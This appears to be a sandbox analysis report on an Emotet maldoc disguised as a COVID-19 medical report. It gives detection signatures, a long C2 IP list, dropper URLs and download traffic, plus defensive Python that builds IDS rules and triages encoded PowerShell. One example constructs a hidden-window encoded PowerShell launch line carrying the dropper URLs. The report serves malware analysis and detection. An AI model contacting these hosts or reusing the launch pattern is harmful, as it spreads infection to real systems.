Analysis Report IU-8549 Medical report COVID-19.doc

Overview

General Information

Sample Name: IU-8549 Medical report COVID-19.doc
Analysis ID: 354471
MD5: be33bce1030d367cf23727936fc1fbfd
SHA1: 2731bb3115108d14d2a4d5abd49aef32468961c9
SHA256: 843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://cab.mykfn.com/admin/X/ Avira URL Cloud: Label: malware
Source: http://gocphongthe.com/wp-content/lMMC/ Avira URL Cloud: Label: malware
Source: http://ie-best.net/online-timer-kvhxz/ilXL/ Avira URL Cloud: Label: malware
Source: http://www.letscompareonline.com/de.letscompareonline.com/wYd/ Avira URL Cloud: Label: malware
Source: http://bhaktivrind.com/cgi-bin/JBbb8/ Avira URL Cloud: Label: malware
Source: http://vanddnabhargave.com/asset/W9o/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 11.2.rundll32.exe.200000.1.unpack Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "78.189.148.42:80", "181.165.68.127:80", "78.188.225.105:80", "161.0.153.60:80", "89.106.251.163:80", "172.125.40.123:80", "5.39.91.110:7080", "110.145.11.73:80", "190.251.200.206:80", "144.217.7.207:7080", "75.109.111.18:80", "75.177.207.146:80", "139.59.60.244:8080", "70.183.211.3:80", "95.213.236.64:8080", "61.19.246.238:443", "174.118.202.24:443", "71.72.196.159:80", "138.68.87.218:443", "24.164.79.147:8080", "49.205.182.134:80", "24.231.88.85:80", "121.124.124.40:7080", "95.9.5.93:80", "118.83.154.64:443", "78.24.219.147:8080", "104.131.11.150:443", "85.105.205.77:8080", "108.53.88.101:443", "187.161.206.24:80", "203.153.216.189:7080", "37.187.72.193:8080", "185.94.252.104:443", "157.245.99.39:8080", "50.91.114.38:80", "87.106.139.101:8080", "74.128.121.17:80", "62.75.141.82:80", "37.139.21.175:8080", "190.103.228.24:80", "134.209.144.106:443", "78.182.254.231:80", "186.74.215.34:80", "180.222.161.85:80", "69.49.88.46:80", "202.134.4.211:8080", "75.113.193.72:80", "139.162.60.124:8080", "79.137.83.50:443", "123.176.25.234:80", "172.105.13.66:443", "93.146.48.84:80", "109.116.245.80:80", "41.185.28.84:8080", "98.109.133.80:80", "194.190.67.75:80", "110.145.101.66:443", "136.244.110.184:8080", "24.179.13.119:80", "89.216.122.92:80", "139.99.158.11:443", "172.86.188.251:8080", "74.40.205.197:443", "62.171.142.179:8080", "167.114.153.111:8080", "119.59.116.21:8080", "74.58.215.226:80", "188.165.214.98:8080", "172.104.97.173:8080", "197.211.245.21:80", "66.57.108.14:443", "188.219.31.12:80", "168.235.67.138:7080", "24.69.65.8:8080", "173.70.61.180:80", "110.142.236.207:80", "51.89.36.180:443", "46.105.131.79:8080", "194.4.58.192:7080", "220.245.198.194:80", "109.74.5.95:8080", "24.178.90.49:80", "181.171.209.241:443", "59.21.235.119:80", "94.23.237.171:443", "12.175.220.98:80", "217.20.166.178:7080", "50.116.111.59:8080", "176.111.60.55:8080", "200.116.145.225:443", "120.150.60.189:80", "185.201.9.197:8080", "202.134.4.216:8080", "120.150.218.241:443", "2.58.16.89:8080", "70.92.118.112:80", "74.208.45.104:8080", "79.130.130.240:8080", "190.240.194.77:443", "85.105.111.166:80", "115.94.207.99:443"]}
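The extracted configuration is the most reusable artifact in this report: the RSA public key identifies the botnet epoch and the C2 list is what goes into blocklists and IDS rules. The Python below is an added example, not the sandbox's extractor or any Emotet code. It loads the configuration exactly as printed above (the C2 list is cut down to six entries taken from the report so the example stays short), walks the DER of the SubjectPublicKeyInfo with a minimal TLV reader to report the modulus size and public exponent, and emits one Suricata/Snort alert per C2 endpoint. The SID range and rule message text are assumptions.

```python
import base64
import json
from collections import Counter

# Configuration as printed by the sandbox's extractor above; the C2 list is
# shortened to six entries taken from the report so the example stays short.
CONFIG_JSON = r'''{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["69.38.130.14:80", "195.159.28.230:8080", "162.241.204.233:8080", "115.21.224.117:80", "5.39.91.110:7080", "61.19.246.238:443"]}'''


def der_read(buf, pos):
    """Read one DER TLV starting at pos. Returns (tag, value, position after the element).
    Handles both short-form and long-form lengths."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def rsa_key_info(spki_b64):
    """Parse a base64 X.509 SubjectPublicKeyInfo carrying an RSA key.
    Returns (modulus_bits, public_exponent). Raises ValueError on unexpected structure."""
    der = base64.b64decode(spki_b64)        # b64decode drops the embedded newlines
    tag, spki, _ = der_read(der, 0)
    if tag != 0x30:
        raise ValueError("SubjectPublicKeyInfo must be a SEQUENCE")
    _, _alg, pos = der_read(spki, 0)        # AlgorithmIdentifier (rsaEncryption OID + NULL), skipped
    tag, bitstr, _ = der_read(spki, pos)
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("expected BIT STRING with 0 unused bits")
    _, rsapub, _ = der_read(bitstr, 1)      # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    _, n_bytes, pos = der_read(rsapub, 0)
    _, e_bytes, _ = der_read(rsapub, pos)
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return n.bit_length(), e


def c2_endpoints(config):
    """Turn the 'C2 list' strings into (ip, port) tuples."""
    out = []
    for entry in config["C2 list"]:
        ip, port = entry.rsplit(":", 1)
        out.append((ip, int(port)))
    return out


def suricata_rules(endpoints, sid_base=9000001):
    """One outbound alert per C2 endpoint. The SID base and msg text are assumptions;
    pick a local SID range that does not collide with ET rules."""
    return [
        f'alert tcp $HOME_NET any -> {ip} {port} (msg:"Emotet C2 from sandbox config {ip}:{port}"; '
        f'flow:to_server; sid:{sid_base + i}; rev:1;)'
        for i, (ip, port) in enumerate(endpoints)
    ]


def analyze(config_json):
    """Summarise the config: key size, exponent, endpoint count, port distribution, rules."""
    config = json.loads(config_json)
    bits, e = rsa_key_info(config["RSA Public Key"])
    endpoints = c2_endpoints(config)
    return {
        "modulus_bits": bits,
        "exponent": e,
        "c2_count": len(endpoints),
        "ports": Counter(port for _, port in endpoints),
        "rules": suricata_rules(endpoints),
    }


if __name__ == "__main__":
    summary = analyze(CONFIG_JSON)
    print(f"RSA-{summary['modulus_bits']} e={summary['exponent']}, "
          f"{summary['c2_count']} C2 endpoints, ports {dict(summary['ports'])}")
    print("\n".join(summary["rules"]))
```

Against the key printed in the report the parser reports a 768-bit modulus with exponent 65537; the key, not the IP list, is the stable identifier to pivot on, since individual C2 nodes in the list rotate while the epoch key does not. The port mix (80, 443, 7080, 8080) is also why the "non-standard ports" signature fires further down.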
Multi AV Scanner detection for domain / URL
Source: vanddnabhargave.com Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Metadefender: Detection: 45%
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll ReversingLabs: Detection: 93%
Multi AV Scanner detection for submitted file
Source: IU-8549 Medical report COVID-19.doc Virustotal: Detection: 63%
Source: IU-8549 Medical report COVID-19.doc Metadefender: Detection: 56%
Source: IU-8549 Medical report COVID-19.doc ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.pdbom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdb\a source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb* source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: <ystem.pdb@) source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2098556907.00000000027F0000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\dll\System.pdb5\ source: powershell.exe, 00000005.00000002.2098752644.0000000002A17000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cab.mykfn.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 166.62.28.130:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49171 -> 195.159.28.230:8080
Source: Traffic Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.22:49173 -> 162.241.204.233:8080
Source: Traffic Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.22:49175 -> 115.21.224.117:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 69.38.130.14:80
Source: Malware configuration extractor IPs: 195.159.28.230:8080
Source: Malware configuration extractor IPs: 162.241.204.233:8080
Source: Malware configuration extractor IPs: 115.21.224.117:80
Source: Malware configuration extractor IPs: 78.189.148.42:80
Source: Malware configuration extractor IPs: 181.165.68.127:80
Source: Malware configuration extractor IPs: 78.188.225.105:80
Source: Malware configuration extractor IPs: 161.0.153.60:80
Source: Malware configuration extractor IPs: 89.106.251.163:80
Source: Malware configuration extractor IPs: 172.125.40.123:80
Source: Malware configuration extractor IPs: 5.39.91.110:7080
Source: Malware configuration extractor IPs: 110.145.11.73:80
Source: Malware configuration extractor IPs: 190.251.200.206:80
Source: Malware configuration extractor IPs: 144.217.7.207:7080
Source: Malware configuration extractor IPs: 75.109.111.18:80
Source: Malware configuration extractor IPs: 75.177.207.146:80
Source: Malware configuration extractor IPs: 139.59.60.244:8080
Source: Malware configuration extractor IPs: 70.183.211.3:80
Source: Malware configuration extractor IPs: 95.213.236.64:8080
Source: Malware configuration extractor IPs: 61.19.246.238:443
Source: Malware configuration extractor IPs: 174.118.202.24:443
Source: Malware configuration extractor IPs: 71.72.196.159:80
Source: Malware configuration extractor IPs: 138.68.87.218:443
Source: Malware configuration extractor IPs: 24.164.79.147:8080
Source: Malware configuration extractor IPs: 49.205.182.134:80
Source: Malware configuration extractor IPs: 24.231.88.85:80
Source: Malware configuration extractor IPs: 121.124.124.40:7080
Source: Malware configuration extractor IPs: 95.9.5.93:80
Source: Malware configuration extractor IPs: 118.83.154.64:443
Source: Malware configuration extractor IPs: 78.24.219.147:8080
Source: Malware configuration extractor IPs: 104.131.11.150:443
Source: Malware configuration extractor IPs: 85.105.205.77:8080
Source: Malware configuration extractor IPs: 108.53.88.101:443
Source: Malware configuration extractor IPs: 187.161.206.24:80
Source: Malware configuration extractor IPs: 203.153.216.189:7080
Source: Malware configuration extractor IPs: 37.187.72.193:8080
Source: Malware configuration extractor IPs: 185.94.252.104:443
Source: Malware configuration extractor IPs: 157.245.99.39:8080
Source: Malware configuration extractor IPs: 50.91.114.38:80
Source: Malware configuration extractor IPs: 87.106.139.101:8080
Source: Malware configuration extractor IPs: 74.128.121.17:80
Source: Malware configuration extractor IPs: 62.75.141.82:80
Source: Malware configuration extractor IPs: 37.139.21.175:8080
Source: Malware configuration extractor IPs: 190.103.228.24:80
Source: Malware configuration extractor IPs: 134.209.144.106:443
Source: Malware configuration extractor IPs: 78.182.254.231:80
Source: Malware configuration extractor IPs: 186.74.215.34:80
Source: Malware configuration extractor IPs: 180.222.161.85:80
Source: Malware configuration extractor IPs: 69.49.88.46:80
Source: Malware configuration extractor IPs: 202.134.4.211:8080
Source: Malware configuration extractor IPs: 75.113.193.72:80
Source: Malware configuration extractor IPs: 139.162.60.124:8080
Source: Malware configuration extractor IPs: 79.137.83.50:443
Source: Malware configuration extractor IPs: 123.176.25.234:80
Source: Malware configuration extractor IPs: 172.105.13.66:443
Source: Malware configuration extractor IPs: 93.146.48.84:80
Source: Malware configuration extractor IPs: 109.116.245.80:80
Source: Malware configuration extractor IPs: 41.185.28.84:8080
Source: Malware configuration extractor IPs: 98.109.133.80:80
Source: Malware configuration extractor IPs: 194.190.67.75:80
Source: Malware configuration extractor IPs: 110.145.101.66:443
Source: Malware configuration extractor IPs: 136.244.110.184:8080
Source: Malware configuration extractor IPs: 24.179.13.119:80
Source: Malware configuration extractor IPs: 89.216.122.92:80
Source: Malware configuration extractor IPs: 139.99.158.11:443
Source: Malware configuration extractor IPs: 172.86.188.251:8080
Source: Malware configuration extractor IPs: 74.40.205.197:443
Source: Malware configuration extractor IPs: 62.171.142.179:8080
Source: Malware configuration extractor IPs: 167.114.153.111:8080
Source: Malware configuration extractor IPs: 119.59.116.21:8080
Source: Malware configuration extractor IPs: 74.58.215.226:80
Source: Malware configuration extractor IPs: 188.165.214.98:8080
Source: Malware configuration extractor IPs: 172.104.97.173:8080
Source: Malware configuration extractor IPs: 197.211.245.21:80
Source: Malware configuration extractor IPs: 66.57.108.14:443
Source: Malware configuration extractor IPs: 188.219.31.12:80
Source: Malware configuration extractor IPs: 168.235.67.138:7080
Source: Malware configuration extractor IPs: 24.69.65.8:8080
Source: Malware configuration extractor IPs: 173.70.61.180:80
Source: Malware configuration extractor IPs: 110.142.236.207:80
Source: Malware configuration extractor IPs: 51.89.36.180:443
Source: Malware configuration extractor IPs: 46.105.131.79:8080
Source: Malware configuration extractor IPs: 194.4.58.192:7080
Source: Malware configuration extractor IPs: 220.245.198.194:80
Source: Malware configuration extractor IPs: 109.74.5.95:8080
Source: Malware configuration extractor IPs: 24.178.90.49:80
Source: Malware configuration extractor IPs: 181.171.209.241:443
Source: Malware configuration extractor IPs: 59.21.235.119:80
Source: Malware configuration extractor IPs: 94.23.237.171:443
Source: Malware configuration extractor IPs: 12.175.220.98:80
Source: Malware configuration extractor IPs: 217.20.166.178:7080
Source: Malware configuration extractor IPs: 50.116.111.59:8080
Source: Malware configuration extractor IPs: 176.111.60.55:8080
Source: Malware configuration extractor IPs: 200.116.145.225:443
Source: Malware configuration extractor IPs: 120.150.60.189:80
Source: Malware configuration extractor IPs: 185.201.9.197:8080
Source: Malware configuration extractor IPs: 202.134.4.216:8080
Source: Malware configuration extractor IPs: 120.150.218.241:443
Source: Malware configuration extractor IPs: 2.58.16.89:8080
Source: Malware configuration extractor IPs: 70.92.118.112:80
Source: Malware configuration extractor IPs: 74.208.45.104:8080
Source: Malware configuration extractor IPs: 79.130.130.240:8080
Source: Malware configuration extractor IPs: 190.240.194.77:443
Source: Malware configuration extractor IPs: 85.105.111.166:80
Source: Malware configuration extractor IPs: 115.94.207.99:443
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in memory: http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/!http://vanddnabhargave.com/asset/W9o/!http://ie-best.net/online-timer-kvhxz/ilXL/!http://gocphongthe.com/wp-content/lMMC/!http://www.letscompareonline.com/de.letscompareonline.com/wYd/!http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
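The "!"-joined string above is the downloader's URL list as it sits in powershell.exe memory; the loader tries each entry in turn until one returns the payload DLL. The sandbox does not print the launching command line itself, so the Python below, an added example that is not part of the report, builds a constructed Sysmon-style process-creation event carrying an -EncodedCommand whose script holds only that URL list, then does what a responder does with such an event: decode the base64/UTF-16LE payload, check the hidden-window and parent-process conditions that detections like "Sigma detected: Suspicious Encoded PowerShell Command Line" key on, and pull the URLs out as indicators. The WmiPrvSE.exe parent is an assumption consistent with the "Creates processes via WMI" signature; the command-line shape and the event field names are likewise assumptions.

```python
import base64
import re

# Constructed Sysmon-style process-creation event. The sandbox report does not print the
# actual command line, so this one is built here: a hidden-window PowerShell launch carrying
# an -EncodedCommand whose script holds only the "!"-separated URL list seen in powershell.exe
# memory above. The WmiPrvSE.exe parent is an assumption ("Creates processes via WMI").
SCRIPT = ("$u='http://cab.mykfn.com/admin/X/!http://bhaktivrind.com/cgi-bin/JBbb8/"
          "!http://vanddnabhargave.com/asset/W9o/'.Split('!')")
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
    "CommandLine": f"powershell -w hidden -nop -enc {ENCODED}",
}

SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "wmiprvse.exe"}
URL_RE = re.compile(r"https?://[^\s'\"!]+")   # '!' excluded: the loader joins its URL list with it


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (PowerShell accepts any unambiguous prefix
    such as -e, -ec, -enc), or None if the flag is absent or the payload is not base64/UTF-16LE."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag and "encodedcommand".startswith(flag):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:             # binascii.Error is a ValueError subclass
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def triage_event(event):
    """Check the conditions an encoded-PowerShell detection keys on (encoded command,
    hidden window, suspicious parent) and recover any URLs from the decoded script."""
    cmd = event["CommandLine"]
    script = decode_encoded_command(cmd)
    indicators = []
    if script is not None:
        indicators.append("encoded_command")
    if re.search(r"-w(indowstyle)?\s+(hidden|1)\b", cmd, re.IGNORECASE):
        indicators.append("hidden_window")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in SUSPICIOUS_PARENTS:
        indicators.append(f"parent:{parent}")
    urls = URL_RE.findall(script) if script else []
    return {"indicators": indicators, "urls": urls, "script": script}


if __name__ == "__main__":
    result = triage_event(SAMPLE_EVENT)
    print(result["indicators"])
    for url in result["urls"]:
        print("dropper URL:", url)
```

Decoding at collection time matters because the base64 hides every string a keyword rule would otherwise match; once decoded, the URL list can be checked against the Avira URL Cloud verdicts at the top of this report without waiting for the sandbox run.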
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 30
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 195.159.28.230:8080
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 162.241.204.233:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /cgi-bin/JBbb8/ HTTP/1.1
    Host: bhaktivrind.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /asset/W9o/ HTTP/1.1
    Host: vanddnabhargave.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /online-timer-kvhxz/ilXL/ HTTP/1.1
    Host: ie-best.net
    Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 71.72.196.159
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HOSTER-KZ
Source: Joe Sandbox View ASN Name: BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN
Source: Joe Sandbox View ASN Name: TTNETTR
Source: unknown TCP traffic detected without corresponding DNS query: 69.38.130.14 (2 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 195.159.28.230 (6 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 162.241.204.233 (6 entries)
Source: unknown TCP traffic detected without corresponding DNS query: 115.21.224.117 (2 entries)
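"TCP traffic without corresponding DNS query" is the network-side fingerprint of a sample that carries its C2 addresses as raw IP:port pairs, which is exactly what the configuration above holds: the only name the sandbox ever resolved was cab.mykfn.com for the first-stage download, and every C2 connection went straight to an address. The Python below, an added example and not part of the sandbox's logic, runs that heuristic over a constructed DNS and connection log modelled on the report's traffic (client 192.168.2.22, the cab.mykfn.com lookup, the 166.62.28.130:80 download and the three Feodo-flagged C2 connections), adds the C2-list lookup and the non-standard-port check, and skips private destinations so the heuristic does not fire on SMB or local services. The timestamps, the 300-second correlation window, the log shape, and the pairing of the cab.mykfn.com query with the 166.62.28.130 answer are assumptions.

```python
import ipaddress

# Subset of the C2 list from the configuration earlier in this report.
C2_ENDPOINTS = {
    ("69.38.130.14", 80), ("195.159.28.230", 8080),
    ("162.241.204.233", 8080), ("115.21.224.117", 80),
}

# Constructed logs modelled on the report's traffic; timestamps are made up and the
# cab.mykfn.com -> 166.62.28.130 pairing is an assumption.
DNS_LOG = [
    # ts, client, query, answers
    (100.0, "192.168.2.22", "cab.mykfn.com", ["166.62.28.130"]),
]
CONN_LOG = [
    # ts, src, sport, dst, dport
    (100.4, "192.168.2.22", 49167, "166.62.28.130", 80),     # download, preceded by DNS
    (100.9, "192.168.2.22", 49168, "192.168.2.1", 445),      # private destination, ignored
    (131.0, "192.168.2.22", 49171, "195.159.28.230", 8080),  # C2, no DNS, odd port
    (133.0, "192.168.2.22", 49173, "162.241.204.233", 8080), # C2, no DNS, odd port
    (135.0, "192.168.2.22", 49175, "115.21.224.117", 80),    # C2, no DNS, port 80
]

DNS_WINDOW = 300.0          # seconds a DNS answer is considered to "explain" a connection
STANDARD_PORTS = {80, 443}


def resolved_before(dns_log, client, dst, ts, window=DNS_WINDOW):
    """True if `client` received `dst` in a DNS answer within `window` seconds before `ts`."""
    return any(
        c == client and dst in answers and 0 <= ts - t <= window
        for t, c, _query, answers in dns_log
    )


def triage_connections(conn_log, dns_log, c2):
    """Flag outbound connections to Internet hosts that (a) had no preceding DNS answer,
    (b) match a known C2 endpoint, or (c) use a port outside the usual web ports."""
    findings = []
    for ts, src, sport, dst, dport in conn_log:
        if not ipaddress.ip_address(dst).is_global:
            continue                       # RFC1918, loopback, link-local: heuristic not applicable
        reasons = []
        if not resolved_before(dns_log, src, dst, ts):
            reasons.append("no_dns")
        if (dst, dport) in c2:
            reasons.append("c2_config_match")
        if dport not in STANDARD_PORTS:
            reasons.append("nonstandard_port")
        if reasons:
            findings.append({"src": f"{src}:{sport}", "dst": f"{dst}:{dport}", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_connections(CONN_LOG, DNS_LOG, C2_ENDPOINTS):
        print(f"{f['src']} -> {f['dst']}: {', '.join(f['reasons'])}")
```

The 166.62.28.130 download is not flagged, because a DNS answer explains it; the three C2 connections are flagged on the DNS heuristic alone, before any threat-intel match, which is the property that makes this check useful against a fresh sample whose C2 list is not yet in Feodo Tracker.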
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmp
Source: global traffic HTTP traffic detected:
    GET /cgi-bin/JBbb8/ HTTP/1.1
    Host: bhaktivrind.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /asset/W9o/ HTTP/1.1
    Host: vanddnabhargave.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /online-timer-kvhxz/ilXL/ HTTP/1.1
    Host: ie-best.net
    Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cab.mykfn.com
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 17 Feb 2021 21:56:45 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Accept-Ranges: bytes
    Vary: Accept-Encoding,User-Agent
    Content-Length: 1699
    Keep-Alive: timeout=5
    Content-Type: text/html
    Data Raw (the report gives this as a hex dump, decoded here; the dump is cut off in the report after "color: #3"):
    <!DOCTYPE html>
    <html>
    <head>
    <title>File Not Found</title>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" >
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style type="text/css">
    body {
      background-color: #eee;
    }

    body, h1, p {
      font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif;
      font-weight: normal;
      margin: 0;
      padding: 0;
      text-align: center;
    }

    .container {
      margin-left:  auto;
      margin-right:  auto;
      margin-top: 177px;
      max-width: 1170px;
